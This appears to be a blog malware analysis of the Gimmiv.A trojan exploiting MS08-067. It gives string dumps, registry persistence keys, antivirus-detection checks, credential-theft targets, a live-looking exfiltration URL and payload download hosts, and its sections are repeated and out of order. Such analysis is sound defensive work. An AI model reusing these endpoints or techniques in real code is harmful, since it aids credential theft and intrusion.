00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe
The malware sysmgr.dll sends ICMP Echo requests to 202.108.22.44 and 64.233.189.147. An Echo reply was returned from 64.233.189.147.
Source Destination Protocol Info
192.168.0.13 202.108.22.44 ICMP Echo (ping) request
192.168.0.13 64.233.189.147 ICMP Echo (ping) request
64.233.189.147 192.168.0.13 ICMP Echo (ping) reply
The ICMP packet contains a string of characters abcde12345fghij6789.
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.
The binary strings of sysmgr.dll reveal the ICMP string and a third IP 212.227.93.146
00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0 212.227.93.146
00039070 00439070 0 64.233.189.147
00039090 00439090 0 202.108.22.44
202.108.22.44 (CN)
Reverse lookup xd-22-44-a8.bta.net.cn
64.233.189.147 (US)
Reverse lookup hk-in-f147.google.com
212.227.93.146 (DE)
Reverse lookup s167748465.websitehome.co.uk
The malware captures host information such as IP address and hostname and credentials from Outlook Express and Protected Storage.
00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr
The malware exfiltrates the captured information to 59.106.145.58/test2.php?abc=[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data protected with encrypted with AES encryption.
00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5
Gimmiv.A attempts to connect to the remote IP address 59.106.145.58 to download a CAB file to %System%\initproc02x.cab. From the CAB file, the trojan extracts the following files:
winbase.dll
basesvc.dll
syicon.dll
311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll
The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.
Public exploit code and malware began circulating as soon as the patch was released. Microsoft and Symantec provided analysis on malware known as Gimmiv.A. The malware harvests and exfiltrates system information and is able to scan and exploit the MS08-067 vulnerability. The following provides analysis findings for Gimmiv.A.
Site 59.106.145.58 (JP) was found to host nine Gimmiv.A binaries, n*1-9.
http[:]// 59.106.145.58/n*.exe
dc3fdfde66fffb6cfbec946a237787d8 397312 59.106.145.58/n1.exe
f173007fbd8e2190af3be7837acd70a4 397312 59.106.145.58/n2.exe
3ee354cc8b63b8849b28e6f376f2b263 397312 59.106.145.58/n3.exe
6c3e53864541bb13fa7853f7b580b807 397312 59.106.145.58/n4.exe
24cd978da62cff8370b83c26e134ff4c 397312 59.106.145.58/n5.exe
86d75ae361637a8f9114bb3a40f710d3 397312 59.106.145.58/n6.exe
ee70f981514803e1fb4e6b65f492a56d 397312 59.106.145.58/n7.exe
8d66f28d028a4838d09ce4b91d35b7cb 397312 59.106.145.58/n8.exe
477aac8d472a7bea8b906718a2f50c67 397312 59.106.145.58/n9.exe
The malware n2.exe was analyzed as an example.
n2.exe creates c:\WINDOWS\system32\wbem\sysmgr.dll
sysmgr.dll
1cdc67b1d55e9a2d30c0dba193375c11
336384 bytes
The following registry keys are created to install the malware as a service.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost
"sysmgr" = sysmgr
"DisplayName" = System Maintenance Service
"ErrorControl" = 0
"ImagePath" = %SystemRoot%\System32\svchost.exe -k sysmgr
"ObjectName" = LocalSystem
"Start" = 2
"Type" = 10, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Enum
"0" = Root\LEGACY_SYSMGR\0000
"Count" = 1
"NextInstance" = 1
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Parameters
"ServiceDll" = C:\WINDOWS\System32\wbem\sysmgr.dll
"ServiceMain" = ServiceMainFunc
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysmgr\Security
"Security" = binary data
The malware searches the registry for the presence of installed antivirus programs and active processes for avp.exe and dwm.exe.
0002549C 1002549C 0 SOFTWARE\BitDefender
000254B4 100254B4 0 avp.exe
000254BC 100254BC 0 SOFTWARE\Jiangmin
000254D8 100254D8 0 SOFTWARE\KasperskyLab
000254F0 100254F0 0 SOFTWARE\Kingsoft
00025504 10025504 0 SOFTWARE\Symantec\PatchInst\NIS
00025524 10025524 0 SOFTWARE\Microsoft\OneCare Protection
0002554C 1002554C 0 SOFTWARE\rising
0002555C 1002555C 0 SOFTWARE\TrendMicro
00025574 10025574 0 dwm.exe
The malware sysmgr.dll sends ICMP Echo requests to 202.108.22.44 and 64.233.189.147. An Echo reply was returned from 64.233.189.147.
Source Destination Protocol Info
192.168.0.13 202.108.22.44 ICMP Echo (ping) request
192.168.0.13 64.233.189.147 ICMP Echo (ping) request
64.233.189.147 192.168.0.13 ICMP Echo (ping) reply
The ICMP packet contains a string of characters abcde12345fghij6789.
0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 30 00 81 00 00 80 01 98 fe c0 a8 00 0d ca 6c .0.............l
0020 16 2c 08 00 ba 5f 02 00 02 00 61 62 63 64 65 31 .,..._....abcde1
0030 32 33 34 35 66 67 68 69 6a 36 37 38 39 00 23 45 fghij6789.
The binary strings of sysmgr.dll reveal the ICMP string and a third IP 212.227.93.146
00039018 00439018 0 abcde12345fghij6789
00039030 00439030 0 212.227.93.146
00039070 00439070 0 64.233.189.147
00039090 00439090 0 202.108.22.44
202.108.22.44 (CN)
Reverse lookup xd-22-44-a8.bta.net.cn
64.233.189.147 (US)
Reverse lookup hk-in-f147.google.com
212.227.93.146 (DE)
Reverse lookup s167748465.websitehome.co.uk
The malware captures host information such as IP address and hostname and credentials from Outlook Express and Protected Storage.
00025E04 10025E04 0 Username
00025E10 10025E10 0 82BD0E67-9FEA-4748-8672-D5EFE5B779B0
00025E38 10025E38 0 Advapi32.dll
00025E48 10025E48 0 CredEnumerate
00025E58 10025E58 0 CredFree
00025E64 10025E64 0 Passport.Net\*
00025E74 10025E74 0 pstorec.dll
00025E80 10025E80 0 PStoreCreateInstance
00025E9C 10025E9C 0 89c39569
00025EA8 10025EA8 0 5e7e8100
00025EB4 10025EB4 0 e161255a
00025EC8 10025EC8 0 StringIndex
00025ED4 10025ED4 0 :String
00025EDC 10025EDC 0 :String
00025EE4 10025EE4 0 http:/
00025EEC 10025EEC 0 https:/
00025EF8 10025EF8 0 ===============Outlook Express===============
00025F28 10025F28 0 ===============Credential Info================
00025F58 10025F58 0 ============Protected Storage Info=============
00025F94 10025F94 0 Pass:
00025F9C 10025F9C 0 URL:
00025FA8 10025FA8 0 GetWebInfo
00025FB4 10025FB4 0 <%s %d> !!! Web ID/Pass Info ERR
00025FE7 10025FE7 0 ksysmgr
The malware exfiltrates the captured information to 59.106.145.58/test2.php?abc=[num]?def=[num]. The abc value represents the installed antivirus version and the def value represents the OS version. The exfiltrated data protected with encrypted with AES encryption.
00025638 10025638 0 ?abc=1
00025648 10025648 0 ?abc=3
00025658 10025658 0 ?abc=4
00025668 10025668 0 ?abc=5
00025678 10025678 0 ?abc=6
00025688 10025688 0 ?abc=7
00025698 10025698 0 ?abc=8
000256A8 100256A8 0 ?abc=9
000256B8 100256B8 0 ?abc=2
000256C8 100256C8 0 ?def=2
000256D8 100256D8 0 ?def=3
000256E8 100256E8 0 ?def=1
000256F8 100256F8 0 ?def=4
00025708 10025708 0 ?def=5
Gimmiv.A attempts to connect to the remote IP address 59.106.145.58 to download a CAB file to %System%\initproc02x.cab. From the CAB file, the trojan extracts the following files:
winbase.dll
basesvc.dll
syicon.dll
311296 82ba009746da8603c463f37e381a42a4 basesvc.dll
200704 60d692fd52098f145e448bd985fcff6d syicon.dll
49152 40cb861ad59c804f340fd8a2a28e226c winbase.dll
The additional dlls provide the functionality of scanning and exploiting the MS08-067 vulnerability.
Subscribe to:
Posts (Atom)